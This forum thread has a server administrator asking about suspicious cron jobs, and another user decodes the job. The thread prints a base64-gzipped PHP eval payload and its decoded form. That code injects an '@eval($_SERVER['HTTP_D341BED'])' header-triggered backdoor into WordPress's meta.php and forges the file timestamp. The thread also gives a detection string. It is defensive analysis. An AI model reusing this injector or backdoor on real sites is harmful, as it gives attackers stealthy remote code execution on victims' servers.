Posted Thursday at 07:56 PM5 days Some users are creating cron jobs under their usename. How can i make shure that this stops? looks like this:/usr/bin/php -r 'eval(gzinflate(base64_decode("jVJrb5swFP2eX8GkSCRqNUHbpIqmaWvTkidLQxriME0RGFMMxjAwUJj632fIsw9p8wd8jc85995z3YjcqB9SRzcJtk2GWuL6MZRmlEUz7+YalqGs3oV4euFm1mqZGUFPWgdKYg06BAbzDA51bA2IBy5cyVrlmX15w8xVx7OGum8AlXN0ab3o5ObwBs8u/K76yMqZ51/N8PjMAIZrKQyBvgst8lyARQQn9VmzJyT3gcxup3pko9LoreQOXMnSb6AwC5Ccgv6YYxgcyzkGS3epK7eOdqdK6nKsaMruv861FJnjnu2KP9E5v08s4DF74rEzWIyuzcewmF2qXbUcdUf+LbF5b5O+5iwlfaH7+mJV2CNd0eZAmpc/7pS+tpxTsPCvR17lj1r5U6pliB3SgbCIApv3bg9IxvspJ5d6bgwUydB7zACaW8Vr0GGc2xPbXxpOSiHDIRXeTqCZoLgt/Gk0BL4ITpjQajopIQ8mc8+FZlIkDAX3NOMxDG3Et8hkDMW0LXwVUsrZmEuVqGWZCepebWxUwbayPG+l2kzCNIaI4x1M0OYJsQ0MKUOUJcdcOyx2hFYUo6dNYDLotl7l38q0q2qF3YoRS2O6pb4cBD6dKuzKPfB5UN+g5B9K29oxhWEcI8g09ISeeQ8JizcxiogJ+fNFovBZEDOz3oh4Lojfv5lxXB/NQjw1cG8GRfli70dd517sTSquJR6b/oB8Wsi+pZ/Sr92geAUPw4fN/WzKo9fXB5Gd6vHzzrxT+4+0//GtGnXAcLAfex2fjFs4E2RpS0spwdR/9xTqxxKlHz2WD5pgYVoVfII4ZOWIl8Zf")));' Edited Thursday at 07:56 PM5 days by leisegang
Yesterday at 12:19 AM1 day This is an obfuscated code in base64. Decoding this base64 sequence, it generate the following php code, that will be executed by php itself through "eval" php function:phpConfValidate('YTo0OntpOjA7czo1MDoiL2hvbWUvZm90YmFsbG5lcmQvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvbWV0YS5waHAiO2k6MTtzOjk4OiJ+ZXZhbFteXChcblxyXSpcKFteXCRdKlwkX1tBLVpdezZ9W15cW10qXFtbXlwnXCJdKltcJ1wiXUhUVFBfRDM0MUJFRFtcJ1wiXVteXF1dKlxdW15cKV0qXClbXjtdKjt+cyI7aToyO3M6MzI6IkBldmFsKCRfU0VSVkVSWydIVFRQX0QzNDFCRUQnXSk7IjtpOjM7czozMzoifl5ccypmdW5jdGlvblxzK3VwZGF0ZV9tZXRhZGF0YX5tIjt9');function phpConfValidate($ser) {list ($fullPath, $systemEnv, $code, $pattern) = unserialize(base64_decode($ser));$source = file_get_contents($fullPath);if (preg_match($systemEnv, $source)) {return;}if (!preg_match($pattern, $source, $matches)) {return;}$incorrectRegex = str_replace('e' . 'va' . 'l', '@?arr' . 'ay', $systemEnv);$newSource = preg_replace($incorrectRegex, '', $source);$newSource = str_replace($matches[0], $code . PHP_EOL . $matches[0], $newSource);if (!preg_match($systemEnv, $newSource)) {return;}$filemtime = filemtime($fullPath) + 10;unlink($fullPath);file_put_contents($fullPath, $newSource);touch($fullPath, $filemtime);}Decoding the following sequence:phpConfValidate('YTo0OntpOjA7czo1MDoiL2hvbWUvZm90YmFsbG5lcmQvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvbWV0YS5waHAiO2k6MTtzOjk4OiJ+ZXZhbFteXChcblxyXSpcKFteXCRdKlwkX1tBLVpdezZ9W15cW10qXFtbXlwnXCJdKltcJ1wiXUhUVFBfRDM0MUJFRFtcJ1wiXVteXF1dKlxdW15cKV0qXClbXjtdKjt+cyI7aToyO3M6MzI6IkBldmFsKCRfU0VSVkVSWydIVFRQX0QzNDFCRUQnXSk7IjtpOjM7czozMzoifl5ccypmdW5jdGlvblxzK3VwZGF0ZV9tZXRhZGF0YX5tIjt9');...we will get the a code, that will saved and be executed in your server:a:4:{i:0;s:50:"/home/fotballnerd/public_html/wp-includes/meta.php";i:1;s:98:"~eval[^\(\n\r]*\([^\$]*\$_[A-Z]{6}[^\[]*\[[^\'\"]*[\'\"]HTTP_D341BED[\'\"][^\]]*\][^\)]*\)[^;]*;~s";i:2;s:32:"@eval($_SERVER['HTTP_D341BED']);";i:3;s:33:"~^\s*function\s+update_metadata~m";}Its a sequence of obsfuscated sequences of codes. This last line make sense to you?If no, is strongly possible your user is trying to crack your server.Check a discussion on this site:https://www.operationdecode.com/http-header-injection-and-modsecurity-evasion/The result on your server is very similar to what is shown on this site, like they said:"Further analysis also indicated that this method could be used to connect to a C2 and act as a zombie host.Throughout our investigation, and in reviewing a large number of these cron and files; we can see this is a direct attack on WordPress, where the code is being injected into default WordPress files that are required for the WordPress page to load. What this allows for, is the malicious actor to send the request directly to the domain name, and not to the affected files to get the desired outcome. Furthermore, when reviewing the access logs, there is no evidence of an attack. What is visible in the logs are only the GET requests to the root of the website. This was tested on a local installation of an infected site.(...)As this method for persistence and connecting to a c2 is very stealthy, it is not easily detected and may be overlooked. A search via the command line for "@eval(http_" should help in finding if this infection exists in your WordPress installation."Regards,Netino Edited yesterday at 12:29 AM1 day by Netino
Create an account or sign in to comment